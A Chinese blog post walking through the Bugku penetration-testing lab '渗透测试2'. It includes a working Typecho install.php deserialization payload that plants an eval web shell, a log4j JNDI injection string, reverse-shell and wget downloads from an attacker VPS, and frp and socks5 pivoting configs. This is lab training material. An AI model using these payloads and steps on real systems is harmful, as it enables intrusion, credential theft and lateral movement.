<!DOCTYPE html>


<html theme="dark" showBanner="true" hasBanner="desktop" > 
<link href="/fontawesome/css/fontawesome.css" rel="stylesheet">
<link href="/fontawesome/css/brands.css" rel="stylesheet">
<link href="/fontawesome/css/solid.css" rel="stylesheet">
<script src="/js/color.global.min.js" ></script>
<script src="/js/load-settings.js" ></script>
<head>
  <meta charset="utf-8">
  
  
  <title>bugku渗透测试2 | F4miti0n&#39;s Blog</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="开启靶场，访问主页，看到了这么个博客，用Wappalyzer简单的做了一下指纹识别，再配合F12查看源码，最终找到了博客的框架版本。上网搜索一下Typecho 1.0&#x2F;14.10.10的nday利用，最终找到这么一篇文章：https:&#x2F;&#x2F;blog.csdn.net&#x2F;weixin_43886198&#x2F;article&#x2F;details&#x2F;111474906，完美符合条件，搭配上文章中提到的poc，我们向in">
<meta property="og:type" content="article">
<meta property="og:title" content="bugku渗透测试2">
<meta property="og:url" content="http://example.com/2023/10/20/bugku%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%952/index.html">
<meta property="og:site_name" content="F4miti0n&#39;s Blog">
<meta property="og:description" content="开启靶场，访问主页，看到了这么个博客，用Wappalyzer简单的做了一下指纹识别，再配合F12查看源码，最终找到了博客的框架版本。上网搜索一下Typecho 1.0&#x2F;14.10.10的nday利用，最终找到这么一篇文章：https:&#x2F;&#x2F;blog.csdn.net&#x2F;weixin_43886198&#x2F;article&#x2F;details&#x2F;111474906，完美符合条件，搭配上文章中提到的poc，我们向in">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/images/cover16.png">
<meta property="article:published_time" content="2023-10-20T08:13:00.000Z">
<meta property="article:modified_time" content="2023-10-28T06:18:33.389Z">
<meta property="article:author" content="F4miti0n">
<meta property="article:tag" content="渗透测试">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/images/cover16.png">
  
    <link rel="alternate" href="/atom.xml" title="F4miti0n's Blog" type="application/atom+xml">
  
  
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-32.png" sizes="32x32">
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-128.png" sizes="128x128">
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-180.png" sizes="180x180">
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-192.png" sizes="192x192">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-32.png" sizes="32x32">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-128.png" sizes="128x128">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-180.png" sizes="180x180">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-192.png" sizes="192x192">
  
  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 6.3.0"></head>

<body>
  
  
    
<div id="banner" class="">
  <img src="/images/banner.png" itemprop="image">
  <div id="banner-dim"></div>
</div>
 
   
  <div id="main-grid" class="shadow   ">
    <div id="nav" class=""  >
      <navbar id="navbar">
  <nav id="title-nav">
    <a href="/">
      <div id="vivia-logo">
        <div class="dot"></div>
        <div class="dot"></div>
        <div class="dot"></div>
        <div class="dot"></div>
      </div>
      <div>F4miti0n's Blog </div>
    </a>
  </nav>
  <nav id="main-nav">
    
      <a class="main-nav-link" href="/">Home</a>
    
      <a class="main-nav-link" href="/archives">Archives</a>
    
      <a class="main-nav-link" href="/about">About</a>
    
  </nav>
  <nav id="sub-nav">
    <a id="theme-btn" class="nav-icon">
      <span class="material-symbols-rounded light-mode-icon">wb_sunny</span>
      <span class="material-symbols-rounded dark-mode-icon">dark_mode</span>
    </a>
    
      <a id="nav-rss-link" class="nav-icon mobile-hide" href="/atom.xml" title="RSS Feed">
        <span class="material-symbols-rounded rss">rss_feed</span>
      </a>
    
    <a id="nav-search-btn" class="nav-icon" title="Search" style="display: none;">
      <span class="material-symbols-rounded">search</span>
    </a>
    <div id="nav-menu-btn" class="nav-icon">
      <span class="material-symbols-rounded">menu</span>
    </div>
  </nav>
</navbar>
<div id="nav-dropdown" class="hidden">
  <div id="dropdown-link-list">
    
      <a class="nav-dropdown-link" href="/">Home</a>
    
      <a class="nav-dropdown-link" href="/archives">Archives</a>
    
      <a class="nav-dropdown-link" href="/about">About</a>
    
    
      <a class="nav-dropdown-link" href="/atom.xml" title="RSS Feed">RSS</a>
     
    </div>
</div>
<script>
  let dropdownBtn = document.getElementById("nav-menu-btn");
  let dropdownEle = document.getElementById("nav-dropdown");
  dropdownBtn.onclick = function() {
    dropdownEle.classList.toggle("hidden");
  }
</script>
    </div>
    <div id="sidebar-wrapper">
      <sidebar id="sidebar">
  
    <div class="widget-wrap">
  <div class="info-card">
    <div class="avatar">
      
        <img src="/images/avatar.png" alt="avatar">
      
      <div class="img-dim"></div>
    </div>
    <div class="info">
      <div class="username">F4miti0n </div>
      <div class="dot"></div>
      <div class="subtitle">每天都在对抗无趣的生活 </div>
      <div class="link-list">
        
          <a class="link-btn" target="_blank" rel="noopener" href="https://twitter.com" title="Twitter"><i class="fa-brands fa-twitter"></i></a>
        
          <a class="link-btn" target="_blank" rel="noopener" href="https://store.steampowered.com" title="Steam"><i class="fa-brands fa-steam"></i></a>
        
          <a class="link-btn" target="_blank" rel="noopener" href="https://github.com" title="GitHub"><i class="fa-brands fa-github"></i></a>
         
      </div>  
    </div>
  </div>
</div>

  
  <div class="sticky">
    
      



    
      
  <div class="widget-wrap">
    <div class="widget">
      <h3 class="widget-title">Tags</h3>
      <ul class="widget-tag-list" itemprop="keywords"><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/CTF%E5%A4%8D%E7%8E%B0/" rel="tag">CTF复现</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/CTF%E6%80%BB%E7%BB%93/" rel="tag">CTF总结</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/HackTheBox/" rel="tag">HackTheBox</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Java%E5%AE%89%E5%85%A8/" rel="tag">Java安全</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/%E5%AE%89%E5%8D%93%E6%B8%97%E9%80%8F/" rel="tag">安卓渗透</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" rel="tag">渗透测试</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/%E9%97%B2%E8%B0%88/" rel="tag">闲谈</a></li></ul>
    </div>
  </div>


    
      
  <div class="widget-wrap">
    <div class="widget">
      <h3 class="widget-title">Archives</h3>
      
      
        <a class="archive-link" href="/archives/2024/03 ">
          March 2024 
          <div class="archive-count">1 </div>
        </a>
      
        <a class="archive-link" href="/archives/2024/02 ">
          February 2024 
          <div class="archive-count">2 </div>
        </a>
      
        <a class="archive-link" href="/archives/2024/01 ">
          January 2024 
          <div class="archive-count">1 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/11 ">
          November 2023 
          <div class="archive-count">1 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/10 ">
          October 2023 
          <div class="archive-count">3 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/09 ">
          September 2023 
          <div class="archive-count">6 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/08 ">
          August 2023 
          <div class="archive-count">7 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/07 ">
          July 2023 
          <div class="archive-count">1 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/05 ">
          May 2023 
          <div class="archive-count">3 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/04 ">
          April 2023 
          <div class="archive-count">2 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/03 ">
          March 2023 
          <div class="archive-count">1 </div>
        </a>
      
    </div>
  </div>


    
      
  <div class="widget-wrap">
    <div class="widget">
      <h3 class="widget-title">Recent Posts</h3>
      <ul>
        
          <a class="recent-link" href="/2024/03/10/RASPDemo/">
            <div class="recent-link-text">
              从零开始的RASP学习
            </div>
          </a>
        
          <a class="recent-link" href="/2024/02/26/Weblogic%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90(%E4%B8%80)/">
            <div class="recent-link-text">
              Weblogic漏洞分析(一)
            </div>
          </a>
        
          <a class="recent-link" href="/2024/02/19/Jackson%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%20(%E4%B8%80)/">
            <div class="recent-link-text">
              Jackson漏洞分析 (一)
            </div>
          </a>
        
          <a class="recent-link" href="/2024/01/01/2023%E5%B9%B4%E5%BA%A6%E6%80%BB%E7%BB%93/">
            <div class="recent-link-text">
              关于2023的年度总结
            </div>
          </a>
        
          <a class="recent-link" href="/2023/11/05/Mysql%E5%AE%A2%E6%88%B7%E7%AB%AF%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96/">
            <div class="recent-link-text">
              Mysql任意文件读取
            </div>
          </a>
        
      </ul>
    </div>
  </div>

    
  </div>
</sidebar>
    </div>
    <div id="content-body">
       

<article id="post-bugku渗透测试2" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  
    
<div class="article-gallery">
  <div class="article-gallery-photos">
    
      <a class="article-gallery-img" rel="gallery_cmlka1zul001cnkwd8j2ob1pe">
        <img src="/images/cover16.png" itemprop="image">
      </a>
    
  </div>
</div>

   
  <div class="article-inner">
    <div class="article-main">
      <header class="article-header">
        
<div class="main-title-bar">
  <div class="main-title-dot"></div>
  
    
      <h1 class="p-name article-title" itemprop="headline name">
        bugku渗透测试2
      </h1>
    
  
</div>

        <div class='meta-info-bar'>
          <div class="meta-info">
  <time class="dt-published" datetime="2023-10-20T08:13:00.000Z" itemprop="datePublished">2023-10-20</time>
</div>
          <div class="need-seperator meta-info">
            <div class="meta-cate-flex">
  
    Uncategorized 
   
</div>
  
          </div>
          <div class="wordcount need-seperator meta-info">
            1.1k words 
          </div>
        </div>
        
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" rel="tag">渗透测试</a></li></ul>

      </header>
      <div class="e-content article-entry" itemprop="articleBody">
        
          <p>开启靶场，访问主页，看到了这么个博客，用Wappalyzer简单的做了一下指纹识别，再配合F12查看源码，最终找到了博客的框架版本。<br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/bugku2%E9%9D%B6%E5%9C%BA/Pasted%20image%2020231024210929.png"><br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/bugku2%E9%9D%B6%E5%9C%BA/Pasted%20image%2020231024210957.png"><br>上网搜索一下<code>Typecho 1.0/14.10.10</code>的nday利用，最终找到这么一篇文章：<a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_43886198/article/details/111474906%EF%BC%8C%E5%AE%8C%E7%BE%8E%E7%AC%A6%E5%90%88%E6%9D%A1%E4%BB%B6%EF%BC%8C%E6%90%AD%E9%85%8D%E4%B8%8A%E6%96%87%E7%AB%A0%E4%B8%AD%E6%8F%90%E5%88%B0%E7%9A%84poc%EF%BC%8C%E6%88%91%E4%BB%AC%E5%90%91install.php%E5%8F%91%E9%80%81%E7%89%B9%E5%AE%9A%E8%AF%B7%E6%B1%82%EF%BC%8C%E6%95%B0%E6%8D%AE%E5%8C%85%E5%86%85%E5%AE%B9%E5%A6%82%E4%B8%8B">https://blog.csdn.net/weixin_43886198/article/details/111474906，完美符合条件，搭配上文章中提到的poc，我们向install.php发送特定请求，数据包内容如下</a></p>
<p><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/bugku2%E9%9D%B6%E5%9C%BA/Pasted%20image%2020231024211216.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">POST /install.php?finish HTTP/1.1</span><br><span class="line">Host: 106.14.212.180</span><br><span class="line">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line">Content-Length: 929</span><br><span class="line">Origin: http://106.14.212.180</span><br><span class="line">Connection: close</span><br><span class="line">Referer: http://106.14.212.180/install.php?finish</span><br><span class="line">Cookie: PHPSESSID=5nt895b5pkbe53mtd5nvkf30f6</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line"></span><br><span class="line">__typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YTo1OntzOjU6InRpdGxlIjtzOjE6IjEiO3M6NDoibGluayI7czoxOiIxIjtzOjQ6ImRhdGUiO2k6MTUwODg5NTEzMjtzOjg6ImNhdGVnb3J5IjthOjE6e2k6MDtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjYzOiJmcHV0cyhmb3Blbignc2hlbGwucGhwJywndycpLCc8Pz1AZXZhbCgkX1JFUVVFU1RbYnV6aGlkYW9dKT8%2BJykiO31zOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9maWx0ZXIiO2E6MTp7aTowO3M6NjoiYXNzZXJ0Ijt9fX1zOjY6ImF1dGhvciI7TzoxNToiVHlwZWNob19SZXF1ZXN0IjoyOntzOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9wYXJhbXMiO2E6MTp7czoxMDoic2NyZWVuTmFtZSI7czo2MzoiZnB1dHMoZm9wZW4oJ3NoZWxsLnBocCcsJ3cnKSwnPD89QGV2YWwoJF9SRVFVRVNUW2J1emhpZGFvXSk%2FPicpIjt9czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfZmlsdGVyIjthOjE6e2k6MDtzOjY6ImFzc2VydCI7fX19fX1zOjY6InByZWZpeCI7czo4OiJ0eXBlY2hvXyI7fQ%3D%3D</span><br></pre></td></tr></table></figure>
<p>输入<code>buzhidao</code>链接蚁剑，根目录下读取文件拿到第一个flag<br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/bugku2%E9%9D%B6%E5%9C%BA/Pasted%20image%2020231024211616.png"></p>
<p>之后再去网站根目录下转转，读取<code>config.inc.php</code>，得到数据库用户名以及密码，用蚁剑的数据管理模块搭配用户名密码链接，读取第二个<code>flag</code><br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/bugku2%E9%9D%B6%E5%9C%BA/Pasted%20image%2020231024211811.png"><br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/bugku2%E9%9D%B6%E5%9C%BA/Pasted%20image%2020231024212019.png"><br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/bugku2%E9%9D%B6%E5%9C%BA/Pasted%20image%2020231024212132.png"></p>
<p>进入横向移动阶段，用拿的<code>webshell</code>传一个<code>fscan</code>到<code>tmp</code>目录下，加权限查本机ip一通乱梭后，fscan直接开扫，扫描结果如下。<br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/bugku2%E9%9D%B6%E5%9C%BA/Pasted%20image%2020231024212602.png"><br>我们重点关注一下<code>192.168.0.3</code>这个<code>IP</code>，老办法传个<code>frp</code>上去，其中frpc的内容如下</p>
<ul>
<li>Frpc.ini<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">[common]</span><br><span class="line"># 服务端地址及端口</span><br><span class="line">server_addr = XXX.XXX.XXX.XXX</span><br><span class="line">server_port = 10013</span><br><span class="line">log_file = /dev/stdout</span><br><span class="line">log_level = info</span><br><span class="line">log_max_days = 3</span><br><span class="line"></span><br><span class="line"># 发布本地 web 服务</span><br><span class="line">[web]</span><br><span class="line">type = tcp</span><br><span class="line"># 映射ip</span><br><span class="line">local_ip = 192.168.0.3</span><br><span class="line"># 映射端口</span><br><span class="line">local_port = 80</span><br><span class="line"># 云服务器的80端口</span><br><span class="line">remote_port = 10014</span><br></pre></td></tr></table></figure></li>
</ul>
<p>上传上去之后vps启动监听，靶机也启动frpc<br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/bugku2%E9%9D%B6%E5%9C%BA/Pasted%20image%2020231024213837.png"><br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/bugku2%E9%9D%B6%E5%9C%BA/Pasted%20image%2020231024213923.png"><br>成功把流量转发到了vps的10014端口上，访问界面如下<br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/bugku2%E9%9D%B6%E5%9C%BA/Pasted%20image%2020231024214154.png"><br>接下来的步骤就是通过目录扫描，发现源码泄露，然后再经过一番代码审计发现存在log4j漏洞，但这么一步一步截图操作下来有些太麻烦了，这里直接开打。</p>
<p>在vps上开启反弹shell监听，准备好jndi注入的链接。<br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/bugku2%E9%9D%B6%E5%9C%BA/Pasted%20image%2020231024214832.png"><br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/bugku2%E9%9D%B6%E5%9C%BA/Pasted%20image%2020231024214851.png"><br>在用户名处输入:  <code>$&#123;jndi:rmi://xxxxxxx:1099/hiksok&#125;</code>,完成jndi注入,vps提示上线,直接查看环境变量, 瞬秒3个flag.<br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/bugku2%E9%9D%B6%E5%9C%BA/Pasted%20image%2020231024215247.png"></p>
<p>然后跳到<code>tmp</code>目录下,用<code>wget</code>命令下载下来我们要用的<code>fscan_amd64</code>和<code>frpc</code> (已经挂在vps上了)</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">vps: </span><br><span class="line">	1. python3 -m http.server 60005</span><br><span class="line">client: </span><br><span class="line">	1. wget http://xxxxxx:60005/fscan_amd64</span><br><span class="line">	2. wget http://xxxxxx:60005/frpc</span><br><span class="line">	3. wget http://xxxxxx:60005/frpc.ini</span><br><span class="line">	4. wget http://xxxxxx:60005/frpc_full.ini</span><br></pre></td></tr></table></figure>

<p>fscan扫描结果如下，这里去把<code>192.168.1.3</code>给代理出来，启动<code>frp</code>，访问代理结果，得到如下界面</p>
<p><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/bugku2%E9%9D%B6%E5%9C%BA/Pasted%20image%2020231024224248.png"><br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/bugku2%E9%9D%B6%E5%9C%BA/Pasted%20image%2020231024235152.png"></p>
<p>这里是用到了我们git上马的一个技巧，去git一个有马的库到本地就行，因为这里可以对phtml进行解析，所以我们的马也要是phtml类型的，这里是自己建了这么一个库，我们直接submit一下地址就可以上马了：<code>https://github.com/F4miti0n/bugku2.git</code>，最终也是蚁剑成功链接，在根目录读取到了第七个<code>flag</code></p>
<p><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/bugku2%E9%9D%B6%E5%9C%BA/Pasted%20image%2020231024235750.png"><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/bugku2%E9%9D%B6%E5%9C%BA/Pasted%20image%2020231024235926.png"></p>
<p>接着到<code>tmp</code>上传<code>frp</code>和<code>fscan_amd64</code>，查完ip之后发现它还有一个网卡，我们把目标定为<code>10.xx.xx.xx</code>这个网段，fscan开扫结果如下。</p>
<p><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/bugku2%E9%9D%B6%E5%9C%BA/Pasted%20image%2020231025000955.png"></p>
<p>基本没什么东西能打了，<code>10.10.0.1</code>和<code>10.10.0.2</code>都被打完了，只有<code>10.10.0.3</code>这么个漏网之鱼还留着。因为它只开了21端口，我们肯定会先想到去打它的<code>ftp</code>服务，比如用匿名访问什么的去试一下。但不管怎么样，显然我们需要先把他给代理出来，再调用一下<code>frp</code>（frpclient内容如下）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">[common]</span><br><span class="line"># 服务端地址及端口</span><br><span class="line">server_addr = xxx.xxx.xxx.xxx</span><br><span class="line">server_port = 10013</span><br><span class="line">log_file = /dev/stdout</span><br><span class="line">log_level = info</span><br><span class="line">log_max_days = 3</span><br><span class="line"></span><br><span class="line"># 构建socks5代理</span><br><span class="line">[socks]</span><br><span class="line">type = tcp</span><br><span class="line">plugin = socks5</span><br><span class="line"># 云服务器的端口</span><br><span class="line">remote_port = 60014</span><br></pre></td></tr></table></figure>

<p>本来是想单独代理一个端口出来的，但发现ftp怎么都链接不上，看提示说好像是还要代理几个别的端口，很烦人，直接上个<code>socks5</code>代理当<code>vpn</code>用算了，靶机那边链接一下frp，kali那边在conf文件下配置<code>/etc/proxychains4.conf</code>。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">socks5 xxx.xxx.xxx.xxx 60014</span><br><span class="line">//文件尾加这么一行</span><br></pre></td></tr></table></figure>

<p>一开始匿名访问没有成功，后来发现原来给提示了，账户名密码都是<code>guest</code>，我们直接就能链接上ftp，最终在根目录和当前目录收集到了最后两个flag。<br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/bugku2%E9%9D%B6%E5%9C%BA/Pasted%20image%2020231025003216.png"><br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/bugku2%E9%9D%B6%E5%9C%BA/Pasted%20image%2020231025003510.png"></p>

        
      </div>

         
    </div>
    
     
  </div>
  
    
<nav id="article-nav">
  <a class="article-nav-btn left "
    
      href="/2023/11/05/Mysql%E5%AE%A2%E6%88%B7%E7%AB%AF%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96/"
      title="Mysql任意文件读取"
     >
    <i class="fa-solid fa-angle-left"></i>
    <p class="title-text">
      
        Mysql任意文件读取
        
    </p>
  </a>
  <a class="article-nav-btn right "
    
      href="/2023/10/14/APT/"
      title="HackTheBox APT"
     >

    <p class="title-text">
      
        HackTheBox APT
        
    </p>
    <i class="fa-solid fa-angle-right"></i>
  </a>
</nav>


  
</article>

 
    </div>
    <div id="footer-wrapper">
      <footer id="footer">
  
  <div id="footer-info" class="inner">
    
    &copy; 2026 F4miti0n<br>
    Powered by <a href="https://hexo.io/" target="_blank">Hexo</a> & Theme <a target="_blank" rel="noopener" href="https://github.com/saicaca/hexo-theme-vivia">Vivia</a>
  </div>
</footer>

    </div>
    <div class="back-to-top-wrapper">
    <button id="back-to-top-btn" class="back-to-top-btn" onclick="topFunction()">
        <span class="material-symbols-rounded">keyboard_arrow_up</span>
    </button>
</div>

<script>
    function topFunction() {
        window.scroll({ top: 0, behavior: 'smooth' });
    }
    let btn = document.getElementById('back-to-top-btn');
    function scrollFunction() {
        if (document.body.scrollTop > 600 || document.documentElement.scrollTop > 600) {
            btn.style.opacity = 1;
        } else {
            btn.style.opacity = 0;
        }
    }
    window.onscroll = function() {
        scrollFunction();
    }
</script>

  </div>
  <script src="/js/light-dark-switch.js"></script>
</body>
</html>
